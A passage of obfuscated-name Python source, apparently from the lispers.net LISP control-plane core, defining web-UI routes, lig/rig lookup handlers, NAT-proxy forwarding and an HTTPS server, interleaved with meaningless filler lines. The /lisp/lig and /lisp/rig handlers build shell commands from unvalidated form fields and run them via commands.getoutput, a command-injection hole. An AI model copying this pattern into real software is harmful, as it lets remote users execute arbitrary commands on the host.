    return lispconfig.lisp_process_show_command(Oo, "show rtr-rloc-probing")
if 33 - 33: I1ii11iIi11i * I1ii11iIi11i . ooOoO0o . i11iIiiIii
if 48 - 48: o0oOOo0O0Ooo . Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
@bottle.post('/lisp/show/rtr/map-cache/lookup')
def Oo0oOo0ooOOOo():
    """Web-UI POST handler: look up a user-supplied EID in the RTR map-cache."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        msg = "Address '{}' has invalid format".format(eid)
        msg = lisp.lisp_print_sans(msg)
        return lispconfig.lisp_show_wrapper(msg)

    # The "%" separator carries the lookup argument to the show command.
    command = "show rtr-map-cache" + "%" + eid
    return lispconfig.lisp_process_show_command(Oo, command)
if 95 - 95: I1IiiI + I1IiiI - OOooOOo - iII111i
if 45 - 45: Ii1I . OoooooooOO
if 27 - 27: Ii1I * Oo0Ooo . OoOoOO00
if 17 - 17: II111iiii % iII111i * OOooOOo % i1IIi . I1IiiI . iIii1I11I1II1
if 27 - 27: i11iIiiIii - I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
@bottle.route('/lisp/show/referral')
def i1i1Ii11Ii():
    """Web-UI route: render the DDT referral-cache page."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    return lispconfig.lisp_process_show_command(Oo, "show referral-cache")
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
@bottle.post('/lisp/show/referral/lookup')
def II11ii():
    """Web-UI POST handler: look up a user-supplied EID in the referral-cache."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        msg = "Address '{}' has invalid format".format(eid)
        msg = lisp.lisp_print_sans(msg)
        return lispconfig.lisp_show_wrapper(msg)

    # The "%" separator carries the lookup argument to the show command.
    command = "show referral-cache" + "%" + eid
    return lispconfig.lisp_process_show_command(Oo, command)
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
@bottle.route('/lisp/show/delegations')
def i11I1I():
    """Web-UI route: render the DDT delegations page."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    return lispconfig.lisp_process_show_command(Oo, "show delegations")
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
@bottle.post('/lisp/show/delegations/lookup')
def i1IiiiiIi1I():
    """Web-UI POST handler: look up a user-supplied EID in the delegations table."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        msg = "Address '{}' has invalid format".format(eid)
        msg = lisp.lisp_print_sans(msg)
        return lispconfig.lisp_show_wrapper(msg)

    # The "%" separator carries the lookup argument to the show command.
    command = "show delegations" + "%" + eid
    return lispconfig.lisp_process_show_command(Oo, command)
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
@bottle.route('/lisp/show/site')
@bottle.route('/lisp/show/site/<eid_prefix>')
def I1(eid_prefix=""):
    """Web-UI route: render the map-server site table, optionally narrowed
    to one EID-prefix taken from the URL."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    command = "show site"
    if eid_prefix != "":
        command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
    return lispconfig.lisp_process_show_command(Oo, command)
if 68 - 68: Ii1I - oO0o + Oo0Ooo
if 44 - 44: Ii1I * o0oOOo0O0Ooo * II111iiii
if 5 - 5: i1IIi + O0 % O0 * O0 + OoOoOO00 % i1IIi
if 80 - 80: iII111i / o0oOOo0O0Ooo + OoO0O00 / oO0o
if 46 - 46: i11iIiiIii / IiII % i1IIi - I11i * OoOoOO00
if 94 - 94: Ii1I - I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo
if 15 - 15: OOooOOo
@bottle.route('/lisp/show/itr/dynamic-eid/<eid_prefix>')
def i1iiI(eid_prefix=""):
    """Web-UI route: render the ITR dynamic-EID table, optionally narrowed
    to one EID-prefix taken from the URL."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    command = "show itr-dynamic-eid"
    if eid_prefix != "":
        command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
    return lispconfig.lisp_process_show_command(Oo, command)
if 12 - 12: o0oOOo0O0Ooo * I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
@bottle.route('/lisp/show/etr/dynamic-eid/<eid_prefix>')
def o00OOo000O(eid_prefix=""):
    """Web-UI route: render the ETR dynamic-EID table, optionally narrowed
    to one EID-prefix taken from the URL."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    command = "show etr-dynamic-eid"
    if eid_prefix != "":
        command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
    return lispconfig.lisp_process_show_command(Oo, command)
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
@bottle.post('/lisp/show/site/lookup')
def OO0ooOoOO0OOo():
    """Web-UI POST handler: longest-match lookup of an EID in the site table."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        msg = "Address '{}' has invalid format".format(eid)
        msg = lisp.lisp_print_sans(msg)
        return lispconfig.lisp_show_wrapper(msg)

    # "@lookup" flags a longest-match lookup rather than an exact display.
    command = "show site" + "%" + eid + "@lookup"
    return lispconfig.lisp_process_show_command(Oo, command)
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
if 5 - 5: OoOoOO00 % iII111i + IiII
if 13 - 13: IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
@bottle.post('/lisp/lig')
def O0Oo0O0():
    """Web-UI POST handler for /lisp/lig: run the lisp-lig tool against a
    user-supplied EID and render its output as HTML."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    eid = bottle.request.forms.get("eid")
    map_resolver = bottle.request.forms.get("mr")
    count = bottle.request.forms.get("count")
    no_nat = "no-info" if bottle.request.forms.get("no-nat") == "yes" else ""

    # Default the map-resolver when the form field is left blank.
    if map_resolver == "":
        map_resolver = "localhost"

    if eid == "":
        msg = "Need to supply EID address"
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(msg))

    # Prefer the .py source over the compiled .pyo when both are present.
    script = ""
    if os.path.exists("lisp-lig.pyo"):
        script = "-O lisp-lig.pyo"
    if os.path.exists("lisp-lig.py"):
        script = "lisp-lig.py"

    if script == "":
        msg = "Cannot find lisp-lig.py or lisp-lig.pyo"
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(msg))

    if count != "":
        count = "count {}".format(count)

    command = 'python {} "{}" to {} {} {}'.format(script, eid, map_resolver,
        count, no_nat)

    html = commands.getoutput(command)
    html = html.replace("\n", "<br>")
    html = lisp.convert_font(html)

    # Indent well-known keywords so the rendered HTML reads hierarchically.
    html = html.replace("RLOC:", lisp.space(2) + "RLOC:")
    html = html.replace("Empty,", lisp.space(2) + "Empty,")
    html = html.replace("geo:", lisp.space(4) + "geo:")
    html = html.replace("elp:", lisp.space(4) + "elp:")
    html = html.replace("rle:", lisp.space(4) + "rle:")
    return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(html))
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
@bottle.post('/lisp/rig')
def I1ii1Ii1():
    """Web-UI POST handler for /lisp/rig: run the lisp-rig DDT tool against a
    user-supplied EID and render its output as HTML."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    eid = bottle.request.forms.get("eid")
    ddt_node = bottle.request.forms.get("ddt")
    follow = "follow-all-referrals" if bottle.request.forms.get("follow") == "yes" else ""

    # Default the DDT node when the form field is left blank.
    if ddt_node == "":
        ddt_node = "localhost"

    if eid == "":
        msg = "Need to supply EID address"
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(msg))

    # Prefer the .py source over the compiled .pyo when both are present.
    script = ""
    if os.path.exists("lisp-rig.pyo"):
        script = "-O lisp-rig.pyo"
    if os.path.exists("lisp-rig.py"):
        script = "lisp-rig.py"

    if script == "":
        msg = "Cannot find lisp-rig.py or lisp-rig.pyo"
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(msg))

    command = 'python {} "{}" to {} {}'.format(script, eid, ddt_node, follow)

    html = commands.getoutput(command)
    html = html.replace("\n", "<br>")
    html = lisp.convert_font(html)

    # Indent the referral list so the rendered HTML reads hierarchically.
    html = html.replace("Referrals:", lisp.space(2) + "Referrals:")
    return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(html))
if 57 - 57: iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
def oOOOOO0Ooooo(eid1, eid2):
    """Resolve two EIDs (or geo-strings) to geo-point strings via lisp-lig.

    For each of eid1/eid2: if it is already a geo-string it is returned
    as-is; otherwise lisp-lig is run against the configured map-resolver
    and the "geo: " line is extracted from its output.  Returns a 2-element
    list whose entries are geo strings or None on failure; returns
    [None, None] when lisp-lig or a map-resolver cannot be found.
    """
    # Prefer the .py source over the compiled .pyo when both are present.
    script = None
    if os.path.exists("lisp-lig.pyo"):
        script = "-O lisp-lig.pyo"
    if os.path.exists("lisp-lig.py"):
        script = "lisp-lig.py"
    if script == None:
        return [None, None]

    # Scrape the first map-resolver address or dns-name out of lisp.config.
    config = commands.getoutput(
        "egrep -A 2 'lisp map-resolver {' ./lisp.config")
    map_resolver = None
    for keyword in ["address = ", "dns-name = "]:
        map_resolver = None
        offset = config.find(keyword)
        if offset == -1:
            continue
        map_resolver = config[offset + len(keyword)::]
        offset = map_resolver.find("\n")
        if offset == -1:
            continue
        map_resolver = map_resolver[0:offset]
        break

    if map_resolver == None:
        return [None, None]

    probe = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    geos = []
    for eid in [eid1, eid2]:
        # Already a geo-string: no lookup required.
        if probe.is_geo_string(eid):
            geos.append(eid)
            continue

        command = 'python {} "{}" to {} count 1'.format(script, eid,
            map_resolver)

        # Try the plain lookup first, then retry with "no-info" (NAT case).
        # Only append None after the second (final) attempt fails.
        for attempt in [command, command + " no-info"]:
            # BUG FIX: previously this always executed `command`, so the
            # " no-info" retry variant was never actually run.
            output = commands.getoutput(attempt)
            offset = output.find("geo: ")
            if offset == -1:
                if attempt != command:
                    geos.append(None)
                continue

            output = output[offset + len("geo: ")::]
            offset = output.find("\n")
            if offset == -1:
                if attempt != command:
                    geos.append(None)
                continue

            geos.append(output[0:offset])
            break

    return geos
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
@bottle.post('/lisp/geo')
def IiIi1II111I():
    """Web-UI POST handler for /lisp/geo: compare a geo-point with a
    geo-prefix (either may be given as an EID that is looked up first) and
    report the distance and whether the point falls inside the circle."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    point_input = bottle.request.forms.get("geo-point")
    prefix_input = bottle.request.forms.get("geo-prefix")
    error = ""

    probe = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    point_geo = lisp.lisp_geo("")
    prefix_geo = lisp.lisp_geo("")
    point_found, prefix_found = oOOOOO0Ooooo(point_input, prefix_input)

    # Validate/resolve the geo-point (literal geo-string or EID lookup).
    if probe.is_geo_string(point_input):
        if point_geo.parse_geo_string(point_input) == False:
            error = "Could not parse geo-point format"
    elif point_found == None:
        error = "EID {} lookup could not find geo-point".format(
            lisp.bold(point_input, True))
    elif point_geo.parse_geo_string(point_found) == False:
        error = "Could not parse geo-point format returned from lookup"

    # Validate/resolve the geo-prefix the same way.
    if error == "":
        if probe.is_geo_string(prefix_input):
            if prefix_geo.parse_geo_string(prefix_input) == False:
                error = "Could not parse geo-prefix format"
        elif prefix_found == None:
            error = "EID-prefix {} lookup could not find geo-prefix".format(lisp.bold(prefix_input, True))
        elif prefix_geo.parse_geo_string(prefix_found) == False:
            error = "Could not parse geo-prefix format returned from lookup"

    if error == "":
        # Only mention the EID when it differs from the resolved geo value.
        point_input = "" if point_input == point_found else \
            ", EID {}".format(point_input)
        prefix_input = "" if prefix_input == prefix_found else \
            ", EID-prefix {}".format(prefix_input)

        point_url = point_geo.print_geo_url()
        prefix_url = prefix_geo.print_geo_url()
        radius = prefix_geo.radius
        point_dd = point_geo.dms_to_decimal()
        point_dd = (round(point_dd[0], 6), round(point_dd[1], 6))
        prefix_dd = prefix_geo.dms_to_decimal()
        prefix_dd = (round(prefix_dd[0], 6), round(prefix_dd[1], 6))
        distance = round(prefix_geo.get_distance(point_geo), 2)
        in_or_out = "inside" if prefix_geo.point_in_circle(point_geo) else \
            "outside"

        pad2 = lisp.space(2)
        pad1 = lisp.space(1)
        pad3 = lisp.space(3)

        error = ("Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " +
            "kilometer radius{}<br>").format(pad2, point_url, point_dd,
            point_input, pad1, prefix_url, prefix_dd, radius, prefix_input)
        error += "Distance:{}{} kilometers, point is {} of circle".format(
            pad3, distance, lisp.bold(in_or_out, True))

    return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(error))
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
def iiIIIIiI111(addr_str, port, nonce):
    """Find a cached NAT info-source either by (address-string, port) or,
    when addr_str is None, by Map-Request nonce.  Returns the info-source
    object or None when no match exists."""
    if addr_str != None:
        for candidate in lisp.lisp_info_sources_by_address.values():
            candidate_addr = candidate.address.print_address_no_iid()
            if candidate_addr == addr_str and candidate.port == port:
                return candidate
        return None

    if nonce != None:
        if nonce not in lisp.lisp_info_sources_by_nonce:
            return None
        return lisp.lisp_info_sources_by_nonce[nonce]

    return None
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
def oo0oO00o0O00o(lisp_sockets, info_source, packet):
    """NAT-proxy an ECM-encapsulated Map-Request received from an
    info-source: rewrite the ITR-RLOC to one of our own RLOCs and re-send
    the Map-Request as a new ECM.

    Returns True when the packet was consumed (proxied or dropped on a
    decode error) and False when an ITR-RLOC is local, meaning the caller
    should process the Map-Request natively.
    """
    ecm = lisp.lisp_ecm(0)
    packet = ecm.decode(packet)
    if packet == None:
        lisp.lprint("Could not decode ECM packet")
        return True

    header = lisp.lisp_control_header()
    if header.decode(packet) == None:
        lisp.lprint("Could not decode control header")
        return True

    if header.type != lisp.LISP_MAP_REQUEST:
        lisp.lprint("Received ECM without Map-Request inside")
        return True

    map_request = lisp.lisp_map_request()
    packet = map_request.decode(packet, None, 0)
    nonce = map_request.nonce
    source_str = info_source.address.print_address_no_iid()

    map_request.print_map_request()

    lisp.lprint("Process {} from info-source {}, port {}, nonce 0x{}".format(
        lisp.bold("nat-proxy Map-Request", False),
        lisp.red(source_str, False), info_source.port,
        lisp.lisp_hex_string(nonce)))

    # Remember the nonce so the matching Map-Reply can be proxied back.
    info_source.cache_nonce_for_info_source(nonce)

    # A subscribing info-source must not time out.
    info_source.no_timeout = map_request.subscribe_bit

    # If any requesting ITR-RLOC is one of ours, this Map-Request is for the
    # local control-plane -- let the caller handle it.
    for itr_rloc in map_request.itr_rlocs:
        if itr_rloc.is_local():
            return False

    # Replace the ITR-RLOC list with our own RLOC and re-encode.
    our_rloc = lisp.lisp_myrlocs[0]
    map_request.itr_rloc_count = 0
    map_request.itr_rlocs = []
    map_request.itr_rlocs.append(our_rloc)

    packet = map_request.encode(None, 0)
    map_request.print_map_request()

    # For an IPv6 target EID, source the ECM from our IPv6 RLOC if we have one.
    target_eid = map_request.target_eid
    if target_eid.is_ipv6():
        our_v6_rloc = lisp.lisp_myrlocs[1]
        if our_v6_rloc != None:
            our_rloc = our_v6_rloc

    ms_running = lisp.lisp_is_running("lisp-ms")
    lisp.lisp_send_ecm(lisp_sockets, packet, target_eid,
        lisp.LISP_CTRL_PORT, target_eid, our_rloc, to_ms=ms_running,
        ddt=False)
    return True
if 9 - 9: I11i - oO0o + O0 / iII111i % i1IIi
if 97 - 97: o0oOOo0O0Ooo * ooOoO0o
if 78 - 78: I11i . OOooOOo + oO0o * iII111i - i1IIi
if 27 - 27: Ii1I % i1IIi . Oo0Ooo % I1Ii111
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
def oO0oOOOooo(lisp_sockets, info_source, packet, mr_or_mn):
    """Forward a Map-Reply (mr_or_mn truthy) or Map-Notify (falsy) back to
    the NAT'd info-source it belongs to, using the source's cached address,
    port, and nonce."""
    source_str = info_source.address.print_address_no_iid()
    source_port = info_source.port
    nonce = info_source.nonce

    mr_or_mn = "Reply" if mr_or_mn else "Notify"
    mr_or_mn = lisp.bold("nat-proxy Map-{}".format(mr_or_mn), False)

    lisp.lprint("Forward {} to info-source {}, port {}, nonce 0x{}".format(
        mr_or_mn, lisp.red(source_str, False), source_port,
        lisp.lisp_hex_string(nonce)))

    dest = lisp.lisp_convert_4to6(source_str)
    lisp.lisp_send(lisp_sockets, dest, source_port, packet)
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
def oooO0o(lisp_sockets, source, sport, packet):
    """Demultiplex a LISP control packet received on port 4342 to the
    appropriate lispers.net component process, or NAT-proxy it to a
    registered info-source."""
    global Oo

    header = lisp.lisp_control_header()
    if header.decode(packet) == None:
        lisp.lprint("Could not decode control header")
        return

    # Info-Requests are handled directly in this (lisp-core) process.
    if header.type == lisp.LISP_NAT_INFO:
        if header.info_reply == False:
            lisp.lisp_process_info_request(lisp_sockets, packet, source, sport,
                                           lisp.lisp_ms_rtr_list)
        return

    # Keep the raw packet around; wrap a copy for IPC delivery.
    raw_packet = packet
    packet = lisp.lisp_packet_ipc(packet, source, sport)

    # Map-Registers and Map-Notify-Acks always go to the map-server.
    if header.type in (lisp.LISP_MAP_REGISTER, lisp.LISP_MAP_NOTIFY_ACK):
        lisp.lisp_ipc(packet, Oo, "lisp-ms")
        return

    if header.type == lisp.LISP_MAP_REPLY:
        map_reply = lisp.lisp_map_reply()
        map_reply.decode(raw_packet)

        info_source = iiIIIIiI111(None, 0, map_reply.nonce)
        if info_source:
            # Nonce matches a NAT info-source; proxy the reply to it.
            oO0oOOOooo(lisp_sockets, info_source, raw_packet, True)
        else:
            lig = "/tmp/lisp-lig"
            if os.path.exists(lig):
                lisp.lisp_ipc(packet, Oo, lig)
            else:
                lisp.lisp_ipc(packet, Oo, "lisp-itr")
        return

    if header.type == lisp.LISP_MAP_NOTIFY:
        map_notify = lisp.lisp_map_notify(lisp_sockets)
        map_notify.decode(raw_packet)

        info_source = iiIIIIiI111(None, 0, map_notify.nonce)
        if info_source:
            oO0oOOOooo(lisp_sockets, info_source, raw_packet, False)
        else:
            lig = "/tmp/lisp-lig"
            if os.path.exists(lig):
                lisp.lisp_ipc(packet, Oo, lig)
            else:
                process = "lisp-rtr" if lisp.lisp_is_running("lisp-rtr") else "lisp-etr"
                lisp.lisp_ipc(packet, Oo, process)
        return

    if header.type == lisp.LISP_MAP_REFERRAL:
        rig = "/tmp/lisp-rig"
        if os.path.exists(rig):
            lisp.lisp_ipc(packet, Oo, rig)
        else:
            lisp.lisp_ipc(packet, Oo, "lisp-mr")
        return

    if header.type == lisp.LISP_MAP_REQUEST:
        # SMRs go to the ITR, ordinary Map-Requests to the ETR.
        process = "lisp-itr" if (header.is_smr()) else "lisp-etr"

        # RLOC-probes are not forwarded over IPC.
        if header.rloc_probe: return

        lisp.lisp_ipc(packet, Oo, process)
        return

    if header.type == lisp.LISP_ECM:
        info_source = iiIIIIiI111(source, sport, None)
        if info_source:
            if oo0oO00o0O00o(lisp_sockets, info_source, raw_packet): return

        # Choose destination process from the ECM addressing bits.
        process = "lisp-mr"
        if header.is_to_etr():
            process = "lisp-etr"
        elif header.is_to_ms():
            process = "lisp-ms"
        elif header.is_ddt():
            if lisp.lisp_is_running("lisp-ddt"):
                process = "lisp-ddt"
            elif lisp.lisp_is_running("lisp-ms"):
                process = "lisp-ms"
        elif lisp.lisp_is_running("lisp-mr") == False:
            process = "lisp-etr"

        lisp.lisp_ipc(packet, Oo, process)
        return
if 7 - 7: iII111i
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
class O0oooo0O(bottle.ServerAdapter):
    """Bottle server adapter serving HTTPS through CherryPy's WSGI server,
    using ./lisp-cert.pem as both certificate and private key."""

    def run(self, hand):
        cert = "./lisp-cert.pem"

        # First run: seed the certificate from the shipped default.
        if os.path.exists(cert) == False:
            os.system("cp ./lisp-cert.pem.default {}".format(cert))
            lisp.lprint("{} does not exist, creating a copy from lisp-cert.pem.default".format(cert))

        server = wsgiserver.CherryPyWSGIServer((self.host, self.port), hand)
        server.ssl_adapter = pyOpenSSLAdapter(cert, cert, None)

        try:
            server.start()
        finally:
            server.stop()
if 60 - 60: OOooOOo
if 73 - 73: ooOoO0o
if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
if 48 - 48: oO0o % ooOoO0o + O0
if 27 - 27: I1ii11iIi11i / OOooOOo
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
def oOooOoOOo0O(bottle_port):
    """Thread entry point for the bottle web UI.

    A negative port means plain HTTP on abs(port); otherwise serve HTTPS
    via the "lisp-ssl-server" adapter, falling back to plain HTTP if the
    SSL server cannot start.
    """
    lisp.lisp_set_exception()

    if bottle_port < 0:
        bottle.run(host="0.0.0.0", port=-bottle_port)
        return

    bottle.server_names["lisp-ssl-server"] = O0oooo0O

    # Bare except preserved from the original: any SSL startup failure
    # falls back to plain HTTP.
    try:
        bottle.run(host="0.0.0.0", port=bottle_port, server="lisp-ssl-server",
                   fast=True)
    except:
        bottle.run(host="0.0.0.0", port=bottle_port, fast=True)
    return
if 28 - 28: IiII + I1IiiI - Oo0Ooo % OOooOOo . I11i + I1IiiI
if 72 - 72: Ii1I / Oo0Ooo / oO0o * OoOoOO00 + OOooOOo
if 58 - 58: o0oOOo0O0Ooo % I1IiiI . I1IiiI * OoO0O00 - IiII . OoooooooOO
if 10 - 10: I1Ii111
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
